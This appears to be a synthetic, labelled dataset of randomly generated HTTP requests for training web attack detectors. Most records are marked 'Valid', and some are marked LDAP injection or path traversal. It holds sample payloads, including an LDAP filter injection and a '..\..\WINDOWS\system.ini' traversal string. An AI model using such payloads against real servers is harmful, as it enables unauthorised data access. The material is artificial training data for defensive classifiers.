UA-CPU: x86
UA-Disp: 725,766,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 237x186
Via: HTTP/2.5 www.rncypi8.shtml, FTP/2.1 www.dtCsn.html, 4.4 243.206.160.219:94411
Transfer-Encoding: identity
Upgrade: kngae/6.3, mste/8.3, wrohS/0.0, nienm/5.3, e33t/4.1
Warning: 771 24.33.242.71:14 "tear3zyE23loeliir" 
X-Forwarded-For: 72.151.254.224
X-Serial-Number: 028740747069773
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

N7wshi=253394&llaw5ioxuhuh5a=euateMh7tLosn

End - Id: 5391
Start - Id: 28874
class: Valid
GET /z7h-ucZ7YyWr-nMyT-_q.dll? HTTP/1.1
Host: 109.72.118.106
Connection: keep-alive
Accept: image/png
Accept-Charset: windows-1257;q=0.4, isiri-3342;q=0.6, windows-1252, cp-936, utf-7
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: no-transform
Client-ip: 184.178.162.162
Cookie: rtwltnufdmtt=imJV-yCDSkd;YMdropN7rjELG=73296556
Cookie2: $Version="298"
Date: Sat, 29 May 04 05:20:18 UTC
ETag: W/"Igz6Ieaag3NtxbKL6"
Expect: ttrs
From: 4zbw@syof.net
If-Modified-Since: Fri, 09 Jul 04 03:57:46 CET
If-Unmodified-Since: Tue, 25 Sep 07 12:10:17 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 30 Jan 04 16:33:38 CET
Max-Forwards: 834
MIME-Version: 8.7
Pragma: ou1haet=tuoi
Proxy-Authorization: NTLM eWVlYXN0d1NvZXVuZmk4ZWVjYUhvdGV0aWllYXVvaGxPaXQ=
Authorization: Digest nc=cD1Eb6A5
Range: -29193,248205-
Referer: http://rfyniNus.net/sheh/pei9g/oeotj.pdf
TE: trailers,trailers,gzip
Trailer: Warning
User-Agent: Mozilla/1.2 (compatible; MSIE 9.6; Linux i386; Nyi2taul; Mene)
UA-CPU: x86
UA-Disp: 246,885,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 122x5513
Via: 0.8 www.Oeer.htm:58, HTTP/4.5 www.shOttt.htm:1785, 3qju/5.2 www.pfse.jpeg
Transfer-Encoding: compress
Upgrade: Heaaio/3.3, roeeIt/7.8, gaane/0.2, iti/4.2, eof/1.2
Warning: 040 96.13.62.246 "MowEhRgbti7m" "Mon, 02 May 05 01:01:14 GMT"
X-Forwarded-For: 149.164.161.105
X-Serial-Number: 687925565922143
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28874
Start - Id: 38609
class: LdapInjection
GET /fz6vmpVd3/Elog3Qgpz@Q/QvH5B/cen/tuBHDQ1_rHkdrudyJ/tse/tIYmeii5ZId5/teae.png?aljtnntep7eEnh=%29++++%28++%7C+++%28displayName%3Dhad*%29++%28name%3D++had*+++%29%28++++mail%3Dhad*%29 HTTP/1.1
Host: www.itHjs.st
Connection: close
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.9
Accept-Language: *
Cache-Control: min-fresh=2349
Client-ip: 37.128.98.220
Cookie: 4re5uaMJAek9u=r28..80tVOh;tu=8ur;eitrkbpt=impm1OGa;wpsdlnihvtIf1=ex-jXLoD-P-;hta=wioCpitWuaehsmn
Cookie2: $Version="74"
Date: Thu, 15 Nov 07 24:18:20 UTC
ETag: W/"B3TaHLjmBKNvfeU"
Expect: yEraech
From: RwOaaelp@gdhst.com
If-Modified-Since: Fri, 01 Aug 08 13:11:41 GMT
If-Unmodified-Since: Sat, 17 Dec 05 01:07:13 CET
If-Match: *
If-None-Match: "nXgL6Y2iYeKg7yUT"
If-Range: Sun, 20 May 07 05:12:59 UTC
Max-Forwards: 531
MIME-Version: 0.3
Pragma: 1nt=oc1h
Proxy-Authorization: Digest nc=aD8e32C0
Authorization: Idfgrb 5gP2s=Mns35Ra
Range: -348176
Referer: http://www.tqsre.fr/tov5cxso/rt3iulh/uo1htt.swf
TE: chunked;q=0.7
Trailer: Max-Forwards
User-Agent: Mozilla/2.5 (compatible; RotcLaausm; Unix; iEgt; otFeita; iSen)
UA-CPU: StrongARM
UA-Disp: 7529,000,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 5976x789
Via: eIi/3.4 197.132.222.219
Transfer-Encoding: deflate
Upgrade: orntea/9.1, iEl/1.0, nny/7.6
Warning: 557 www.qUo1.jpeg "esote5naNsdrk" 
X-Forwarded-For: 248.9.49.144
X-Serial-Number: 325446948
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38609
Start - Id: 25729
class: Valid
GET /3LBwzh5gV8RkDn/sb/rZ8WrUrVUDTc/nthtuypepl/n-T8mX8/kijroE4hehsfOc/Jperl-21.MEprocessing-instruction1system@exec8/dzSGXZ7pBG11XTF6oNf/odePOntlasd/aoeRnidijHnEvr0zqdyh/cv_wmQCtx46WFvvw.tiff?iTtgEso4SttEn=ua&EfDoejhYe2na=gsi%5Ceee&cti=wcoIa9tb5obqa&IhttpPjDa=BErrj2iwmfd&wxgroup byL=131566 HTTP/1.1
Host: www.Gbaoio6it.biz
Connection: yXNer0s
Accept: */*;q=0.9
Accept-Charset: windows-1257;q=0.2, utf-8, euc-jp;q=0.3, windows-1257;q=0.4
Accept-Encoding: *
Accept-Language: *;q=0.8
Cache-Control: no-store
Client-ip: 13.141.241.140
Cookie: mr=71223;iyGeYspea=httptn;iN:;dI0lR=esamynoQpg0aTrrM
Cookie2: $Version="766"
Date: Sat, 13 May 06 19:39:23 CET
ETag: W/"Xtgr-G7kiBsHZKXyq"
Expect: rs6arew6
From: xschuvm@deiWYe.gov
If-Modified-Since: Thu, 11 Oct 07 23:58:50 GMT
If-Unmodified-Since: Sun, 08 Mar 09 14:58:13 UTC
If-Match: "NkVhB294tqE-OZMuU2Xn"
If-None-Match: "OFw8m4NB.JgG1wF-C4W"
If-Range: "hhZL@wS6zSOIBr21A.7l"
Max-Forwards: 05
MIME-Version: 0.2
Pragma: eotoc='a'
Proxy-Authorization: Digest algorithm=MD5
Authorization: NTLM Y3ZvMmxpdG5ieWVlUm9PZXJhYW1tTVNldG14aGdzYnJhaXVlaGFhZGZuTWl0MG4=
Range: 5-5065,03839-,886020-
Referer: http://uiuu.de/rdpo6fb/aYta.txt
TE: gzip,gzip;q=0.7,trailers
Trailer: TE
User-Agent: Mozilla/5.6 (compatible; Konqueror/8.9; Win 9x; 6sers)
UA-CPU: MIPS
UA-Disp: 7894,3200,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 5684x8166
Via: FTP/5.7 www.9iFnN.png
Transfer-Encoding: compress
Upgrade: ceULo/2.9, itmu/9.5, m6nr5/9.3
Warning: 612 www.1jatrt.shtml "npmzRiead4" 
X-Forwarded-For: 4.231.239.216
X-Serial-Number: 64360194
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25729
Start - Id: 45856
class: PathTransversal
GET /iwor1nba2cooeem/rAnlandra97e.cfm?o05tse2=zettjuge&dOageatMo=50529176&kKKr=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWINDOWS%5Csystem.ini&ivm=rHl&PnMsF-Jlvbscriptihl=646492&OEFn8Y@6Ai=orv&oeryu0id=mI.jZWV02tw2 HTTP/1.1
Host: www.iuka.gov
Connection: keep-alive
Accept: audio/x-wav;q=0.8, application/*;q=0.9, audio/*;q=0.9
Accept-Charset: euc-tw;q=0.3, x-mac-arabic;q=0.3, isiri-3342;q=0.7
Accept-Encoding: *;q=0.5
Accept-Language: n-ur, wnE-ndahr;q=0.0
Cache-Control: no-store
Client-ip: 136.24.127.56
Cookie: cByY=9;etpFenqaPadn=Ke2tlDHi;lhog=3509968;ane6yua=t08wQ
Cookie2: $Version="19"
Date: Wed, 06 Apr 05 15:55:04 GMT
ETag: "Qy7TUM9@9Ytx9uIGT"
Expect: rh6tfy
From: emalit@e3Ooine.st
If-Modified-Since: Sun, 01 Aug 04 14:09:35 CET
If-Unmodified-Since: Wed, 14 Mar 07 03:22:03 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 09 Jan 06 22:46:10 UTC
Max-Forwards: 48
MIME-Version: 2.1
Pragma: 02Twseeu='b7e'
Proxy-Authorization: Digest uri=/weir/iIesdqv/isbaatja.nsf
Authorization: Digest uri=/doti8/eosjyiik.exe
Range: 81947-,357703-
Referer: http://bi2oi.org/t2se.rar
TE: trailers,chunked
Trailer: Max-Forwards
User-Agent: sZ_0OCbH. http://www.isfytw.ch
UA-CPU: Sparc
UA-Disp: 318,072,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 8255x255
Via: hed6i/0.5 112.115.219.136, ge3tfa/7.6 200.111.79.170
Transfer-Encoding: deflate
Upgrade: eAm77t/3.2, rcioQv/9.7, fitc/1.5
Warning: 078 www.eFerJs.html:545 "nhptoteG" 
X-Forwarded-For: 239.104.254.12
X-Serial-Number: 61308570883843
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45856
Start - Id: 25736
class: Valid
GET /bat8uu6b0calrO/foatmstSithaoo/idspl/it6ttrAorE/s@nbr1xPQfGRVRTVoBYg/YhItpeiwseTbc9n/PSnai8LXEs/kgP/SHi7.ASUwget.aspx?2dyrutnhOco=temocha&henHyarwmbhhi=nItWradcrlQels9&kB.kVD-=cxp_t%40i1E%7Ewgettmpde&tn56iui=517569918&Oy=o4nghrCmHqF&0iefsN1sersts=vheyaat%29&1ag3processing-instructionyh=turioarsre&tpigifEwo=rde%3Ci&friAdojintsKu=s5ebu1r&o64r3os4mzduft=tNWgFQA&e8ara=nS2wmna2aludetrve&Lee8=t%3D&scrpaS4er9ehta=r%3F%3Fr HTTP/1.0
Host: www.9wbwteede.com
Connection: close
Accept: */*;q=0.0
Accept-Charset: iso-8859-4;q=0.1, utf-7;q=0.6, us-ascii
Accept-Encoding: *
Accept-Language: *;q=0.0
Cache-Control: no-store
Client-ip: 201.188.83.227
Cookie: oeisEhnbgnmpo=asuea
Cookie2: $Version="25"
Date: Wed, 02 Mar 05 11:27:42 UTC
ETag: W/"Hd49XJxD5aG5izO-T"
Expect: mfpntsav
From: xschuvm@deiWYe.gov
If-Modified-Since: Wed, 28 Sep 05 20:23:38 UTC
If-Unmodified-Since: Sun, 16 Jan 05 03:00:26 UTC
If-Match: "jJFIsq6nyU0BzBB"
If-None-Match: *
If-Range: Mon, 16 Jun 08 14:49:01 GMT
Max-Forwards: 67
MIME-Version: 3.5
Pragma: wcsnEnjx=r98wde2A
Proxy-Authorization: NTLM c3NoT2VsdDRlbzFuMThpanJ0aWFxYzlocEE3bjZhOHVsdXNteWlhZWFu
Authorization: NTLM Y3ZvMmxpdG5ieWVlUm9PZXJhYW1tTVNldG14aGdzYnJhaXVlaGFhZGZuTWl0MG4=
Range: 5-5065,03839-,886020-
Referer: /Arrn.php3
TE: gzip,trailers,chunked;q=0.6
Trailer: User-Agent
User-Agent: eKMDEzr7Co http://www.fni23.st
UA-CPU: PowerPC
UA-Disp: 7894,3200,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 7472x595
Via: 7.6 89.76.223.189, 4.6 www.zeteO.jpeg, HTTP/9.2 105.239.238.101
Transfer-Encoding: identity
Upgrade: ceULo/2.9, itmu/9.5, m6nr5/9.3
Warning: 612 www.1jatrt.shtml "npmzRiead4" 
X-Forwarded-For: 1.21.31.218
X-Serial-Number: 64360194
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25736
Start - Id: 17759
class: Valid
GET /hadmin3d6dfmailreplaceNIw/cxtr4sutynzh1xplelAb/c3OV3-ta/chboll.asp?uoWnoe=aqj HTTP/1.1
Host: www.Tksnhter.de
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: zca-l03tLne, itenrdl-oirdTt, gslOte-8ymtor;q=0.2
Cache-Control: L='trzi'
Client-ip: 28.227.18.202
Cookie: roaDyeatx=6tishqnyeoneadlh;emeeMf=egWlwigs1emspi;lp6hch=)dgoptd6dras7%ui;emsueeeilMte=7esx\s[s-
Cookie2: $Version="6"
Date: Tue, 07 Jun 05 24:58:43 UTC
ETag: "b_VazRPTzHx3nePx8qp"
Expect: t8om=sryw
From: 0D8aoioi@bieedfc.uk
If-Modified-Since: Tue, 28 Oct 08 19:15:37 CET
If-Unmodified-Since: Mon, 11 Apr 05 18:13:29 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 7563
MIME-Version: 5.9
Pragma: no-cache
Proxy-Authorization: Digest username="ldobnen"
Authorization: eua8a sil3uoco=ttruL
Range: 33-,5-4,824-
Referer: http://7hsNENMR.uk/7ltc/eieA/nqfnege/6naa.mpeg
TE: trailers,trailers,gzip;q=0.7
Trailer: Expect
User-Agent: Mozilla/7.5 (Windows; U; Windows NT 9.3; Ee-we; rv:8.3.1) Gecko/22485848
UA-CPU: x86
UA-Disp: 192,3054,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 582x198
Via: 1.2 105.213.213.215, 6.5 www.O1pc.gif, FTP/9.2 193.79.243.227
Transfer-Encoding: gzip
Upgrade: ZHn/3.1
Warning: 678 11.137.65.227 "evit8rnat97eUs" "Fri, 07 Oct 05 12:11:03 CET"
X-Forwarded-For: 105.19.29.209
X-Serial-Number: 197606037
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17759
Start - Id: 34209
class: Valid
PUT /oStOagtxc0eat/j9jFJmb_/o_W-8wicqOxPz6qI/fkE2/eL/lTUJRX/asixysd8nNena/bSSiQ.bin? HTTP/1.0
Content-Length: 208
Content-Language: d
Content-Encoding: identity
Content-Location: /fkslev/wtghiz/e8wkb/Ojx6.wav
Content-MD5: aXpodGFlejZ3Y2Vzbmlkcw==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 14 Jan 05 22:22:58 CET
Last-Modified: Thu, 08 Jan 04 09:25:13 CET
Host: 8.4.170.145:91412
Connection: keep-alive
Accept: application/postscript;q=0.3, image/*
Accept-Charset: shift_jis
Accept-Encoding: deflate;q=0.7, deflate, gzip;q=0.5, gzip
Accept-Language: Hut3s-nqi;q=0.5, sEedaz-Nht, tagyJor9-aym0enn
Cache-Control: max-age=177
Client-ip: 76.113.209.101
Cookie: slwq=389883451;vsolamahE=464261;ozmoelAoRurFl=oF1lM0_;hvm8bidd029=l5tpttaoeejrbrtlqn;HQRP_yk=forma
Cookie2: $Version="29"
Date: Sat, 27 May 06 23:51:14 UTC
ETag: "Gg1B1yaE-jhaS2.AN"
Expect: 100-continue
From: tmwyT@acvot.it
If-Modified-Since: Sun, 29 Nov 09 09:48:54 CET
If-Unmodified-Since: Sat, 19 Jan 08 09:37:24 UTC
If-Match: "LAzGPS5JYSqJp_T"
If-None-Match: *
If-Range: Wed, 15 Mar 06 07:33:39 GMT
Max-Forwards: 79
MIME-Version: 8.9
Pragma: tsoeGkw='R'
Proxy-Authorization: mhdk mTsemHH2=tiTaS
Authorization: Digest uri=http://www.eehr2i.de/T6id/lbese/6olru.mdb
Range: -23,2252-463,93059-
Referer: http://htytinan.it/aeotilo/rinw/HIueka.php
TE: deflate;q=0.0,gzip;q=0.4,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/1.8 (compatible; fnsi; Solaris; mneAiU2nro; OHmabn; n6lsleait)
UA-CPU: x86
UA-Disp: 5943,076,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 306x913
Via: 6.8 242.227.51.87:91755, FTP/4.8 79.240.235.203, FTP/1.3 145.112.189.172
Transfer-Encoding: sutxb
Upgrade: ey6gg/6.4, mid/9.0, tq0u/3.6, tt7tio/5.3, foheo/4.7
Warning: 512 216.143.142.78 "ottsasnlt" 
X-Forwarded-For: 220.117.161.15
X-Serial-Number: 7747668675736673
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

oso1E=Ur&oeSteownttm=suUTn&ootetrdaTuitais=smnsogjmatlbE0a&eisbrecee=062&tBftwynsf=d]d|owi&e8Ntrsf=iVE2Cz&noauln5toadRiDe=rHPjvRyX.9&hpsinput559X-=iie8unra&rdr=tniaycdhbiZa&oAt=~llgIaOk-formegsystemetrE

End - Id: 34209
Start - Id: 16831
class: Valid
GET /8Dbdteetel/vrsos/a3@DK5PF@RrvV/7EAZvhstdinoLaw/lx/ttoeeeen/sG@.4XuiAA8eEV1P.H/m0ygR/e2tSelKTU3H/wAsGXp7RV/6Mbw7/eb.cfm?Tnalmneii=%5Bts6s&hj=nLU&upsaYkigfduEbk=477834&dacd4iseja=7e+l&Yk5di7iituUelm=si&Yrlwe=662227&enttiErdl=rea+&kVXwBHZyYYT=lno&oesos=%29%5Cor4t&ersoY=gMrnMJ2OT2G&u5o3EKl=eiewrt0nisshoajhek&rinlth=4&ass=+e%3F&ageo2iabzi=9552796&aeLselem=427504 HTTP/1.0
Host: 157.198.190.78:80
Connection: close
Accept: */*;q=0.4
Accept-Charset: us-ascii;q=0.1, x-mac-roman, x-mac-chinesesimp;q=0.2
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: max-stale
Client-ip: 241.14.31.61
Cookie: zaf=t1;Tiugtiso8evtsf=54202558;iwvIvLI8vPx8=nsohaimt7]gfoErrs;eaesdrAotiro0aj=$e+cbetween;pGVIcifYEJ9t=];wnOc=mSNe
Cookie2: $Version="60"
Date: Fri, 24 Aug 07 05:03:03 GMT
ETag: "itjXOwKf@iA@iiML87g"
Expect: 100-continue
From: sLreap3i@a64Yedt.be
If-Modified-Since: Sat, 23 Jul 05 17:42:43 GMT
If-Unmodified-Since: Fri, 30 May 08 05:02:35 GMT
If-Match: *
If-None-Match: "Rv9RXRDpttAjaUwk"
If-Range: *
Max-Forwards: 5951
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: NTLM YWZBYWFvam9nZmUxazVlM2VhYXMwZWVpc3NzZWhJemVsdElmb3NlaHlOeWdk
Authorization: mt9tz Oroae6o=Natt
Range: 9-87181
Referer: http://www.8etri.cz/onUatrn/hciau/tDDe/esdd/absfdf.swf
TE: deflate;q=0.5,trailers,gzip;q=0.9
Trailer: If-Range
User-Agent: iibnstcee
UA-CPU: StrongARM
UA-Disp: 952,004,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 818x5345
Via: HTTP/0.2 www.tmesb.js
Transfer-Encoding: deflate
Upgrade: lenv/1.1, ndi/4.7
Warning: 045 www.on6iee.shtml "rinmaEtgssGotet" 
X-Forwarded-For: 244.9.245.19
X-Serial-Number: 60090044663
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16831
Start - Id: 19703
class: Valid
GET /s5XL1@_sYTfX/ob@G8MvaDpAFYOZDpGi.tiff?s3=a+&swtela2mdc=qbiW&Eebtlj7=vwUR-qNe-l4&an=8+tp4e8fbloptsnph-wa&r6c7Z=rJs5I01yFtDM&aziioeoiooieet=mcBe&sioq=6twcglafen&Dhv4ratuiryan=ng%5Demrz0replaceknhan&DpiHtte3et=qzn&BstmpwVFK.=sAh0nnwdnsthl&rnJscript=%3C+9&dnosthwmvmail=5293 HTTP/1.1
Host: www.8ieta.gov
Connection: keep-alive
Accept: application/zip;q=0.8
Accept-Charset: koi8
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 96.38.206.107
Cookie: ek=5;L_incopy=580286;7h=nJC8ZDr@M
Cookie2: $Version="9"
Date: Mon, 11 Oct 04 01:48:12 UTC
ETag: W/"OZYuALpI03b7894yF"
Expect: inaoc
From: moea@estmzx.uk
If-Modified-Since: Sat, 31 Oct 09 07:40:50 CET
If-Unmodified-Since: Fri, 10 Dec 04 05:14:13 UTC
If-Match: "RpoFUwFtEvhikeFHjp"
If-None-Match: "QQWZ3pEAuZVnVgWN"
If-Range: *
Max-Forwards: 433
MIME-Version: 5.3
Pragma: no-cache
Proxy-Authorization: is6eir e7Od1r=qus9thtv
Authorization: Basic ZGVhU3Q6c3RyRWRPb1M=
Range: -6,-1,-676621
Referer: http://www.iigpnc.fr/ybprohr.png
TE: chunked;q=0.7
Trailer: If-Match
User-Agent: setdtdilrt (a3AN3Yiz; trL.QJ8; 8@IeH09N; yet0KcRSp; gNx0ovQ6F)
UA-CPU: PowerPC
UA-Disp: 2543,113,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 947x1810
Via: FTP/2.6 53.147.222.195:70
Transfer-Encoding: compress
Upgrade: 2eglrr/4.5, A52ic/9.9, ntnlr/5.9, lahWl/8.7
Warning: 409 239.183.137.136 "kwybnsisahj2Sco" "Sun, 04 Dec 05 21:19:44 UTC"
X-Forwarded-For: 103.115.185.154
X-Serial-Number: 7592797493312
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 19703
Start - Id: 14165
class: Valid
GET /7pn/rla0taesmldg.cfm?aetl=%3C HTTP/1.0
Host: 156.16.173.135
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: *;q=0.9
Accept-Encoding: *;q=0.8
Accept-Language: *
Cache-Control: no-transform
Client-ip: 252.93.128.234
Cookie: UsafYb=icihts
Cookie2: $Version="31"
Date: Wed, 27 Jan 10 06:54:01 CET
ETag: W/"RQw9ZWEPLqLmoy3"
Expect: 100-continue
From: njbl@eaoae.be
If-Modified-Since: Thu, 02 Nov 06 21:15:52 GMT
If-Unmodified-Since: Sat, 27 Jan 07 05:59:58 UTC
If-Match: "9Pk263TPy2oCCuVHzW0_"
If-None-Match: *
If-Range: Sun, 09 Jul 06 16:45:10 UTC
Max-Forwards: 07
MIME-Version: 6.6
Pragma: no-cache
Proxy-Authorization: Basic b3VyaDp1d2RoZWY=
Authorization: Digest nonce
Range: 3510-,64-0
Referer: http://www.lneOmsma.org/atifl4h/IhoThi/sxi0h1zA.cgi
TE: chunked;q=0.5,gzip;q=0.6,chunked;q=0.7
Trailer: Trailer
User-Agent: Mozilla/7.0 (Windows; U; Win98 7.0; ez-cA; rv:3.2.8) Gecko/12666059
UA-CPU: x86
UA-Disp: 9830,719,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 579x5749
Via: 3.8 www.iotg.png:306
Transfer-Encoding: gzip
Upgrade: seiblm/4.3
Warning: 166 42.97.253.158 "rwatpa" 
X-Forwarded-For: 126.23.131.140
X-Serial-Number: 600487511
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14165
Start - Id: 23776
class: Valid
GET /etSomajsic/7VoJQcxEID7mkkftp/ocGf/ageqmrrteptna/x30whereOF-/eotsu2Cto0uB/y1LWm5Cta/o.iframeWwidTHLtperlH/ce1cSddoiaN/dod/nqZh.exe? HTTP/1.0
Host: 137.69.234.250:3
Connection: eicnhde
Accept: */*
Accept-Charset: hz-gb-2312
Accept-Encoding: 
Accept-Language: ici-euarosfn
Cache-Control: max-age=60064
Client-ip: 149.198.205.168
Cookie: 6tajeiic=iAouis;rEhlrdTsstrct=lbmetat;Qiform0TS=j5FPev8qcWnv
Cookie2: $Version="99"
Date: Wed, 27 May 09 01:38:52 UTC
ETag: "ZDceVWyJnHNX8R8rJBxN"
Expect: 100-continue
From: yiews@64sy.de
If-Modified-Since: Thu, 22 Oct 09 12:21:59 GMT
If-Unmodified-Since: Mon, 30 May 05 13:31:31 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 02 Feb 07 16:36:40 CET
Max-Forwards: 1211
MIME-Version: 8.1
Pragma: e=Riqf
Proxy-Authorization: NTLM ZWJJZW1mMXRhYURudGFuc1JpZml0bmFpaWhhSWUzYWw=
Authorization: Digest nonce
Range: -9
Referer: http://www.tbeeer7s.st/tetft0/DS0hr/aeceh/soile/Rsos.php
TE: trailers,trailers
Trailer: Accept-Charset
User-Agent: Mozilla/4.1 (Machintosh; U; PPC Mac OS X 3.7; i4-mr; rv:6.2.8) Gecko/71703394
UA-CPU: 68000
UA-Disp: 492,2265,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 884x6494
Via: FTP/9.2 188.40.155.64, HTTP/7.4 www.rdagr.html
Transfer-Encoding: compress
Upgrade: z9ot/5.3, nmy/4.3, aoiir/1.9, 1h4/2.4
Warning: 878 57.54.63.222:6388 "irenHNsmhbtddnye" 
X-Forwarded-For: 180.65.250.66
X-Serial-Number: 599405037
----: -----------
~~~~~: ~~~~~~~~~~~

null

End - Id: 23776
Start - Id: 20165
class: Valid
GET /n2od5u20rlseiehyi.mdb?khmAnolie=+&onWyQngg=zfahy&noaeo=atepdts3nzeAcda&trHnL=957&ea=wzsay HTTP/1.0
Host: www.eeydhl5I.org
Connection: orahoml
Accept: image/*;q=0.2, text/*;q=0.8, application/rtf
Accept-Charset: *;q=0.0
Accept-Encoding: identity;q=0.2, compress;q=0.7, compress;q=0.8, gzip;q=0.1
Accept-Language: naEdidi-gpren;q=0.3
Cache-Control: only-if-cached
Client-ip: 99.135.103.152
Cookie: vh=I;rtTstaTt4=ehbacek7gtln6;-EUHJ9lTO=zmninputs
Cookie2: $Version="224"
Date: Sun, 13 Feb 05 18:49:31 CET
ETag: W/"e79xNrsSJ4l28i@mqK"
Expect: Git7ecn
From: sb62@aupq5s0rh.st
If-Modified-Since: Mon, 09 Oct 06 07:38:47 GMT
If-Unmodified-Since: Mon, 24 Nov 08 21:09:11 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 662
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: srrnsA krEeR=Tsg3ode
Authorization: NTLM ZXRodGVpdDdjaXR5blJlRjUwYm90bElkZmU5dGliZWNhUm5u
Range: 365749-,607-065
Referer: /oaeli/eMatr4en.jpg
TE: trailers
Trailer: Warning
User-Agent: Mozilla/0.0 (compatible; hindeTodnf; Win 9x; Lhacemlo; i1hct; Tlrfe4ad)
UA-CPU: PowerPC
UA-Disp: 972,951,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 297x878
Via: FTP/0.0 26.234.112.57, gNaroE/5.4 www.6un6bt.css:5, HTTP/3.0 www.pjog.htm
Transfer-Encoding: compress
Upgrade: 5to/3.5
Warning: 954 65.131.167.41 "hmcunrisa0nopxeaart" 
X-Forwarded-For: 108.223.104.239
X-Serial-Number: 818940289037897740
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20165
Start - Id: 18130
class: Valid
GET /passwdQC8bgMqQ-bd5/hZwwhh6R/gfUuVlBp6Z/ndIahallV4neanasetez.jpeg?8at36srn=0347069&bUAd=7&dcXpi=lr4&aernhaae8lt=770&s3aiiadq7m=ymb0d%3F HTTP/1.0
Host: www.heelc.ch
Connection: close
Accept: */*;q=0.2
Accept-Charset: *;q=0.8
Accept-Encoding: compress, gzip, compress;q=0.2, deflate;q=0.7
Accept-Language: *;q=0.8
Cache-Control: only-if-cached
Client-ip: 102.113.167.199
Cookie: eIt0ir=128407;anroelavabccae=eThwvNL;eznepasswdDpxCbd=ea;Fnt=30553;o4=10636
Cookie2: $Version="10"
Date: Tue, 22 Sep 09 10:59:58 UTC
ETag: "uf2hAGsqmjS43WUx"
Expect: 100-continue
From: hwDyshr1@ecneonN.be
If-Modified-Since: Sun, 08 Aug 04 20:32:28 UTC
If-Unmodified-Since: Sun, 06 Jul 08 14:34:58 GMT
If-Match: "Rdmzd4rA4xPbCWFK-RH"
If-None-Match: "2s4ZMmM-ATXHCMGUXQ"
If-Range: Tue, 19 May 09 10:51:52 GMT
Max-Forwards: 6361
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: Digest uri=http://www.a7y0h6.st/wer1vn5/ve4oBpa/efs7f/viroox.js
Authorization: Digest response="Ad8E23477426A4d43BCEB1CbCdbD870f"
Range: 24-,21839-647
Referer: /ig83/tLesajaj/0iebt/hTtd/c41a.asp
TE: trailers
Trailer: Range
User-Agent: cksse (hr7gzADOq; ePWPwDWHHZ; aye2-gWO)
UA-CPU: Sparc
UA-Disp: 2247,5505,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 4077x543
Via: FTP/3.3 211.251.1.239
Transfer-Encoding: compress
Upgrade: 8rhetT/2.2, 0fno/6.2, Swi/2.0, ehe/1.3, iaeicr/1.5
Warning: 432 www.uatfoT.gif "ojer8gtnteao0ut" "Wed, 24 Mar 10 12:45:46 GMT"
X-Forwarded-For: 7.193.95.179
X-Serial-Number: 0610755676490078
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18130
Start - Id: 26637
class: Valid
GET /mwohpteowltyoixnb/a@iRVYGamz@LS/aFhEFaAyJSR610a1TqY/rWW0ejxUL6XNl/rOZveBfReFYo3neT/dimgOk5.cfm?dsesneet=eoptie HTTP/1.1
Host: www.otehhevS.it
Connection: keep-alive
Accept: text/*, application/rtf
Accept-Charset: *;q=0.6
Accept-Encoding: *;q=0.0
Accept-Language: *
Cache-Control: max-stale
Client-ip: 17.159.200.83
Cookie: Cno5asgeri6=24879218;nwrknol=qeyrCP3t5dh0lu4;IesleTnwesdatmd=048786
Cookie2: $Version="70"
Date: Mon, 27 Sep 04 01:35:34 UTC
ETag: W/"uKgrmrzh9QNWJkdjF@"
Expect: Ewe7
From: wduC@od60uuact.fr
If-Modified-Since: Sat, 30 Apr 05 03:58:58 GMT
If-Unmodified-Since: Mon, 06 Mar 06 07:28:37 GMT
